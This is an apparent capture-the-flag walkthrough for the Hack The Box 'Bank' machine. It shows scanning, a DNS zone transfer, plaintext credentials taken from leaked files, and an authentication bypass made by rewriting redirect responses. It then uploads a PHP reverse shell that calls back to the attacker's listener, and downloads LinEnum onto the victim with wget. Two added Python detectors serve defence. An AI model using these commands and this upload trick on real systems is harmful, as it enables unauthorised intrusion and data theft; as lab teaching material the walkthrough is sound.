Bank


Bank01.png

Port scans

root@kali:~/HTB/Machines/Bank# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.29 --rate=1000
Starting masscan 1.0.5 at 2019-11-18 04:54:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.29
Discovered open port 53/udp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 53/tcp on 10.10.10.29

Nmap

root@kali:~/HTB/Machines/Bank# nmap -A -T4 -v 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:54 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating Ping Scan at 23:54
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 23:54, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:54
Scanning bank.htb (10.10.10.29) [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Completed SYN Stealth Scan at 23:54, 0.62s elapsed (1000 total ports)
Initiating Service scan at 23:54
Scanning 3 services on bank.htb (10.10.10.29)
Completed Service scan at 23:54, 6.09s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against bank.htb (10.10.10.29)
adjust_timeouts2: packet supposedly had rtt of -341735 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341735 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341224 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341224 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341479 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341479 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341542 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341542 microseconds.  Ignoring time.
Retrying OS detection (try #2) against bank.htb (10.10.10.29)
adjust_timeouts2: packet supposedly had rtt of -644605 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -644605 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -743682 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -743682 microseconds.  Ignoring time.
Initiating Traceroute at 23:54
Completed Traceroute at 23:54, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:54
Completed Parallel DNS resolution of 2 hosts. at 23:54, 0.19s elapsed
NSE: Script scanning 10.10.10.29.
Initiating NSE at 23:54
Completed NSE at 23:54, 8.24s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.16s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.038s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: HTB Bank - Login
|_Requested resource was login.php
Aggressive OS guesses: Linux 3.13 (94%), Linux 3.2 - 4.9 (94%), Linux 3.16 (93%), Linux 3.18 (93%), Linux 4.2 (93%), Linux 4.8 (93%), Linux 4.9 (93%), Crestron XPanel control system (93%), ASUS RT-N56U WAP (Linux 3.4) (92%), Linux 3.12 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 199.637 days (since Thu May  2 09:36:43 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   37.42 ms 10.10.14.1
2   37.55 ms bank.htb (10.10.10.29)

NSE: Script Post-scanning.
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds
           Raw packets sent: 1115 (54.068KB) | Rcvd: 2543 (103.658KB)

Vulnerability scan

root@kali:~/HTB/Machines/Bank# nmap -p 22,53,80 --script vuln 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:56 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.037s latency).

PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open  domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=bank.htb
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://bank.htb:80/
|     Form id:
|_    Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /login.php: Possible admin folder
|_  /inc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 345.44 seconds

The only vulnerability reported is a denial of service (Slowloris), which is not usable for gaining access.

DNS enumeration

root@kali:~/HTB/Machines/Bank# dig @10.10.10.29 axfr bank.htb
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> @10.10.10.29 axfr bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 38 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Mon Nov 18 00:36:13 EST 2019
;; XFR size: 6 records (messages 1, bytes 171)

The zone transfer is allowed, and the SOA record carries an administrator email (chris@bank.htb). That looks like a good hint. The web page is also hosted at bank.htb.

Web enumeration

The web page at http://bank.htb shows a login page.

Bank03.png

And Wappalyzer shows PHP technology.

Bank02.png

root@kali:~/HTB/Machines/Bank# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://bank.htb

dirsearch v0.3.8
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-18_11-41-22.log
Target: http://bank.htb
[11:41:22] Starting:
[11:41:24] 403 -  281B  - /icons/
[11:41:25] 302 -    3KB - /support.php  ->  login.php
[11:41:25] 403 -  283B  - /uploads/
[11:41:25] 302 -    7KB - /index.php  ->  login.php
[11:41:25] 403 -  279B  - /.php
[11:41:26] 200 -    2KB - /login.php
[11:41:27] 200 -    2KB - /assets/
[11:41:33] 302 -    0B  - /logout.php  ->  index.php
[11:41:42] 200 -    1KB - /inc/
[11:54:25] 403 -  289B  - /server-status/
[12:07:52] 200 -  248KB - /balance-transfer/
Task Completed

The enumeration finds several PHP pages and an interesting folder, balance-transfer. A second point: index.php and support.php redirect to login.php, but their sizes (7 kB and 3 kB) are too big for a simple redirect.

Web page analysis

index.php

root@kali:~# curl -v http://bank.htb/index.php
*   Trying 10.10.10.29:80...
* TCP_NODELAY set
* Connected to bank.htb (10.10.10.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: bank.htb
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 22 Nov 2019 01:27:50 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
* Added cookie HTBBankAuth="q4m77li6rp2gq91so2a0mhf1i2" for domain bank.htb, path /, expire 0
< Set-Cookie: HTBBankAuth=q4m77li6rp2gq91so2a0mhf1i2; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: login.php
< Content-Length: 7322
< Content-Type: text/html
<
<div class="col-md-10">
 <br>
     <div class="row">
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-primary">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-usd fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;"> $</div>
                             <div>Balance</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-yellow">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-shopping-cart fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;">8</div>
                             <div>Total Transactions</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-green">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-credit-card fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;">0</div>
                             <div>Total CreditCards</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-red">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-support fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;">0</div>
                             <div>Support Tickets</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
     </div>
     <!-- /.row -->
     <div class="">
         <div class="panel panel-default">
             <div class="panel-heading">
                 <h3 style="font-size: 20px;"><i class="fa fa-credit-card fa-fw"></i> CreditCard Information</h3>
             </div>
             <div class="panel-body">
                 <div class="table-responsive">
                     <table class="table table-bordered table-hover table-striped">
                         <thead>
                             <tr>
                                 <th>Card Type</th>
                                 <th>Card Number</th>
                                 <th>Card Exp Date</th>
                                 <th>CVV</th>
                                 <th>Balance</th>
                             </tr>
                         </thead>
                         <tbody>
                                                     </tbody>
                     </table>
                 </div>
             </div>
         </div>
     </div>
     <div class="">
         <div class="panel panel-default">
             <div class="panel-heading">
                 <h3 style="font-size: 20px;"><i class="fa fa-money fa-fw"></i> Transaction History</h3>
             </div>
             <div class="panel-body">
                 <div class="table-responsive">
                     <table class="table table-bordered table-hover table-striped">
                         <thead>
                             <tr>
                                 <th>Transaction ID</th>
                                 <th>Transaction Date</th>
                                 <th>Transaction Time</th>
                                 <th>Amount (USD)</th>
                             </tr>
                         </thead>
                         <tbody>
                             <tr>
                                 <td>3326</td>
                                 <td>10/21/2016</td>
                                 <td>3:29 PM</td>
                                 <td>$321.33</td>
                             </tr>
                             <tr>
                                 <td>3325</td>
                                 <td>10/21/2016</td>
                                 <td>3:20 PM</td>
                                 <td>$234.34</td>
                             </tr>
                             <tr>
                                 <td>3324</td>
                                 <td>10/21/2016</td>
                                 <td>3:03 PM</td>
                                 <td>$724.17</td>
                             </tr>
                             <tr>
                                 <td>3323</td>
                                 <td>10/21/2016</td>
                                 <td>3:00 PM</td>
                                 <td>$23.71</td>
                             </tr>
                             <tr>
                                 <td>3322</td>
                                 <td>10/21/2016</td>
                                 <td>2:49 PM</td>
                                 <td>$8345.23</td>
                             </tr>
                             <tr>
                                 <td>3321</td>
                                 <td>10/21/2016</td>
                                 <td>2:23 PM</td>
                                 <td>$245.12</td>
                             </tr>
                             <tr>
                                 <td>3320</td>
                                 <td>10/21/2016</td>
                                 <td>2:15 PM</td>
                                 <td>$5663.54</td>
                             </tr>
                             <tr>
                                 <td>3319</td>
                                 <td>10/21/2016</td>
                                 <td>2:13 PM</td>
                                 <td>$943.45</td>
                             </tr>
                         </tbody>
                     </table>
                 </div>
             </div>
         </div>
     </div>
 <!-- /.row -->
 </div>
 <br>
 </div>
 <!-- /.container-fluid -->
         </div>
         <!-- /#page-wrapper -->
 <br>
     </div>
     <!-- /#wrapper -->
 <br>
     <!-- jQuery -->
     <script src="./assets/js/jquery.js"></script>
 <br>
     <!-- Bootstrap Core JavaScript -->
     <script src="./assets/js/bootstrap.min.js"></script>
 <br>
     <!-- Morris Charts JavaScript -->
     <script src="./assets/js/plugins/morris/raphael.min.js"></script>
     <script src="./assets/js/plugins/morris/morris.min.js"></script>
     <script src="./assets/js/plugins/morris/morris-data.js"></script>
 <br>
     <!-- SweetAlert -->
     <script src="./assets/js/sweetalert.min.js"></script>
 <br>
 </body>
 <br>
 </html>
 * Connection #0 to host bank.htb left intact

The response is a 302 redirect to login.php, but index.php delivers the page content before the redirect takes effect. This is a vulnerability, because the application's information can be read without being logged in.

support.php

root@kali:~# curl -v http://bank.htb/support.php
*   Trying 10.10.10.29:80...
* TCP_NODELAY set
* Connected to bank.htb (10.10.10.29) port 80 (#0)
> GET /support.php HTTP/1.1
> Host: bank.htb
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 22 Nov 2019 01:31:04 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
* Added cookie HTBBankAuth="afsdndhrkur5j9mpginc2se6t1" for domain bank.htb, path /, expire 0
< Set-Cookie: HTBBankAuth=afsdndhrkur5j9mpginc2se6t1; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: login.php
< Content-Length: 3291
< Content-Type: text/html
<
<br>
 <div class="col-sm-5">
     <div class="panel panel-primary">
         <div class="panel-heading">
             <h3 style="font-size: 20px;">My Tickets</h3>
         </div>
         <div class="panel-body">
                     <div class="content-box-large">
                         <div class="panel-body">
                             <table class="table table-bordered">
                                 <thead>
                                     <tr>
                                         <th>#</th>
                                         <th>Title</th>
                                         <th>Message</th>
                                         <th>Attachment</th>
                                         <th>Actions</th>
                                     </tr>
                                 </thead>
                                 <tbody>
                                                                 </tbody>
                             </table>
                         </div>
                     </div>
                 </div>
     </div>
 </div>
 <!-- New Ticket -->
 <div class="col-sm-5">
     <section class="panel">
 <br>
         <div class="panel-body">
             <form class="new_ticket" id="new_ticket" accept-charset="UTF-8" method="post" enctype="multipart/form-data">
 <br>
                 <label>Title</label>
                 <input required placeholder="Title" class="form-control" type="text" name="title" id="ticket_title" style="background-repeat: repeat; background-image: none; background-position: 0% 0%;">
                 <br>
 <br>
                 <label>Message</label>
                 <textarea required placeholder="Tell us your problem" class="form-control" style="height: 170px; background-repeat: repeat; background-image: none; background-position: 0% 0%;" name="message" id="ticket_message"></textarea>
                 <br>
                 <div style="position:relative;">
                                <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
                                        <a class='btn btn-primary' href='javascript:;'>
                                             Choose File...
                                             <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40"  onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'>
                                         </a>
                                          
                                         <span class='label label-info' id="upload-file-info"></span>
                                 </div>
                                 <br>
                 <button name="submitadd" type="submit" class="btn btn-primary mt20" data-disable-with="<div class="loading-o" style="padding: 7px 21px;"></div>">Submit</button>
             </form>
 <br>
         </div>
 <br>
     </section>
 <br>
 </div>
 <br>
         </div>
         <!-- /#page-wrapper -->
 <br>
     </div>
     <!-- /#wrapper -->
 <br>
     <!-- jQuery -->
     <script src="./assets/js/jquery.js"></script>
 <br>
     <!-- Bootstrap Core JavaScript -->
     <script src="./assets/js/bootstrap.min.js"></script>
 <br>
     <!-- Morris Charts JavaScript -->
     <script src="./assets/js/plugins/morris/raphael.min.js"></script>
     <script src="./assets/js/plugins/morris/morris.min.js"></script>
     <script src="./assets/js/plugins/morris/morris-data.js"></script>
 <br>
     <!-- SweetAlert -->
     <script src="./assets/js/sweetalert.min.js"></script>
 <br>
 </body>
 <br>
 </html>
 * Connection #0 to host bank.htb left intact

Again, the content is sent along with the redirect. In this case there is a form that allows uploading files. More important, the HTML comment indicates that files with the .htb extension are executed as PHP.
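The size anomaly the dirsearch output hinted at, turned into a check: an added example (not from the original write-up) that parses a raw HTTP response and flags a 3xx redirect that still carries a page body, as index.php and support.php do above. The sample responses are constructed, and the byte threshold and tag list are my own heuristics; in PHP the usual cause of this behaviour is a header('Location: ...') call that is not followed by exit.

```python
"""Flag HTTP redirects that still ship a full page body.
Added example, not part of the original write-up; sample responses are constructed."""
import re

# A plain redirect carries at most a short "Moved" stub; anything larger,
# or anything containing real markup, means the script kept rendering
# after emitting the Location header (in PHP: no exit after header()).
MAX_STUB_BYTES = 512                      # assumed threshold
MARKUP = re.compile(r"<(form|table|input|script)\b", re.IGNORECASE)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def redirect_leaks_content(raw: bytes):
    """Return a list of findings; an empty list means the redirect looks clean."""
    status, headers, body = parse_response(raw)
    findings = []
    if not (300 <= status < 400 and "location" in headers):
        return findings                   # not a redirect at all
    if len(body) > MAX_STUB_BYTES:
        findings.append(f"{len(body)} byte body on {status} redirect")
    tag = MARKUP.search(body.decode("utf-8", "replace"))
    if tag:
        findings.append(f"redirect body contains <{tag.group(1).lower()}>")
    return findings


# Constructed sample: same shape as the support.php response above.
LEAKY = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache/2.4.7 (Ubuntu)\r\n"
    b"Location: login.php\r\n"
    b"Content-Type: text/html\r\n\r\n"
    + b"<html><body>" + b"<br>" * 200
    + b'<form id="new_ticket" method="post" enctype="multipart/form-data">'
      b'<input type="file" name="fileToUpload"></form></body></html>'
)

# Constructed sample: the script stopped right after sending the header.
CLEAN = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: login.php\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in (("support.php", LEAKY), ("fixed", CLEAN)):
        print(name, redirect_leaks_content(raw) or "ok")
```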

Folder balance-transfer

Bank10.png

There are a bunch of files, but their content is encrypted.

Bank11.png

Download of files from balance-transfer

root@kali:~/HTB/Machines/Bank/balance-transfer# wget -r http://bank.htb/balance-transfer/
root@kali:~/HTB/Machines/Bank/balance-transfer# cd bank.htb/balance-transfer/
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# ls -l *.acc | wc -l
999

There are about a thousand files. Finding something interesting in there is like searching for a needle in a haystack. But I remembered the email from the DNS enumeration, and bingo:

root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# grep chris@bank.htb *.acc
68576f20e9732f1b2edc4df5b8533230.acc:Email: chris@bank.htb
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .

Access to the application

With the user and password, we can log into the application.

Bank04.png

The support page allows file upload.

Bank05.png

Creation of a PHP reverse shell

root@kali:~/HTB/Machines/Bank# cp /usr/share/webshells/php/php-reverse-shell.php ./
Update the parameters of the reverse shell
root@kali:~/HTB/Machines/Bank# grep CHANGE php-reverse-shell.php
$ip = '10.10.14.34';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

Run listener

root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444

Upload file to support page

Bank06.png

Bank07.png

But the upload fails.

Renaming the reverse shell with the .htb extension

Because of the comment on the support page, I renamed the file with the .htb extension.

<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Bank08.png

This time it works: the file is uploaded.

Bank09.png

Open the reverse shell

root@kali:~/HTB/Machines/Bank# curl http://bank.htb/uploads/php-reverse-shell.htb

And on the listener

root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.29.
Ncat: Connection from 10.10.10.29:34304.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 04:52:21 up  2:12,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bank:/$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nvlp 4444
root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134
root@kali:~/HTB/Machines/Bank# stty raw -echo
root@kali:~/HTB/Machines/Bank# fg rlwrap nc -nvlp 4444
www-data@bank:/$ export TERM=screen
export TERM=screen
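From the defender's side, the upload-then-execute chain above leaves a recognisable trace in the Apache access log. This added example (not part of the original page) correlates a POST to support.php with a later GET under /uploads/ for an extension the server would hand to PHP, including the .htb extension named in the debug comment; the log lines are constructed and the extension list is an assumption.

```python
"""Detect the support.php upload followed by execution from /uploads/.
Added example, not from the original write-up; log lines are constructed."""
import re
from collections import defaultdict

# Apache combined log format, only the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# .php/.phtml/.php5 are the usual handler-mapped extensions; .htb is the one
# the debug comment in support.php says was added to the PHP handler.
EXEC_EXT = {"php", "phtml", "php5", "htb"}   # assumed list
UPLOAD_FORM = "/support.php"
UPLOAD_DIR = "/uploads/"


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def script_extension(path: str):
    """Return the extension if it is one PHP would execute, else None."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext if ext in EXEC_EXT else None


def find_upload_execution(lines):
    """Return (ip, path) pairs where a client posted to the support form and
    later fetched an executable file from the uploads directory."""
    posted = defaultdict(bool)            # ip -> has it posted to the form?
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(UPLOAD_FORM):
            posted[rec["ip"]] = True
        elif (rec["method"] == "GET" and rec["path"].startswith(UPLOAD_DIR)
              and script_extension(rec["path"]) and posted[rec["ip"]]):
            hits.append((rec["ip"], rec["path"]))
    return hits


# Constructed sample log; 10.10.14.34 mirrors the attacking box in the write-up,
# 10.10.14.50 is an unrelated client that never touched the form.
SAMPLE_LOG = """\
10.10.14.34 - - [18/Nov/2019:04:50:01 +0000] "GET /support.php HTTP/1.1" 200 3291
10.10.14.34 - - [18/Nov/2019:04:51:10 +0000] "POST /support.php HTTP/1.1" 200 3405
10.10.14.34 - - [18/Nov/2019:04:52:20 +0000] "GET /uploads/php-reverse-shell.htb HTTP/1.1" 200 0
10.10.14.50 - - [18/Nov/2019:05:00:00 +0000] "GET /uploads/invoice.pdf HTTP/1.1" 200 44120
10.10.14.50 - - [18/Nov/2019:05:01:00 +0000] "GET /uploads/notes.php HTTP/1.1" 404 281
""".splitlines()

if __name__ == "__main__":
    for ip, path in find_upload_execution(SAMPLE_LOG):
        print(f"ALERT {ip} executed uploaded file {path}")
```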

Alternative way to gain the reverse shell without the user and password

As noted before, the web application sends the HTML code along with the redirect. We can use this coding mistake to upload a file through the support page without authentication.

Setup Burp suite

Bank12.png

We want to filter the interceptions from and to the machine bank.htb, and we want to intercept responses too.

Access the form

Send the request for the page support.php

Bank13.png

When the response comes back, we see that the server responds 302 (redirect) and the Location header points to the page login.php.

Bank14.png

The response is modified so the browser receives a 200 OK, and the Location header is removed.

Bank15.png

The form appears on the browser.

Bank16.png

Upload the file

Fill the form with the reverse shell file and submit it.

Bank17.png

Forward the request.

Bank18.png

Modify the response to 200 OK, without the Location header.

Bank19.png

The file is uploaded to the server.

Bank20.png

Start the listener

root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Open the reverse shell

Bank21.png

And the reverse shell is opened.

root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.29.
Ncat: Connection from 10.10.10.29:34114.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 06:13:32 up 22 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bank:/$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nvlp 4444
root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134
root@kali:~/HTB/Machines/Bank# stty raw -echo
root@kali:~/HTB/Machines/Bank# fg rlwrap nc -nvlp 4444
www-data@bank:/$ export TERM=screen
export TERM=screen

User flag

www-data@bank:/$ cat /home/chris/user.txt
cat /home/chris/user.txt
<USER_FLAG>

Privilege escalation

Download the script LinEnum.sh

root@kali:~/HTB/Machines/Bank# wget -q https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

To upload the file to the server, I start a local web server.

root@kali:~/HTB/Machines/Bank# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

And the script is downloaded to the victim.

www-data@bank:/$ cd /tmp
cd /tmp
www-data@bank:/tmp$ wget http://10.10.14.34/LinEnum.sh
wget http://10.10.14.34/LinEnum.sh
--2019-11-18 17:35:36--  http://10.10.14.34/LinEnum.sh
Connecting to 10.10.14.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46108 (45K) [text/x-sh]
Saving to: 'LinEnum.sh'

100%[======================================>] 46,108 --.-K/s in 0.09
2019-11-18 17:35:36 (494 KB/s) - 'LinEnum.sh' saved [46108/46108]

www-data@bank:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh

Run enumeration script

www-data@bank:/tmp$ ./LinEnum.sh -r linenum -e /tmp/ -t

I copy the report to my machine to read it more easily.

www-data@bank:/tmp$ scp -r linenum-18-11-19 LinEnum-export-18-11-19/ root@10.10.14.34:/root/HTB/Machines/Bank/linenum/

Useful information from the Linux enumeration

DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"

uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
The file /var/www/bank/bankreports.txt
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root  root  4.0K May 28  2017 .
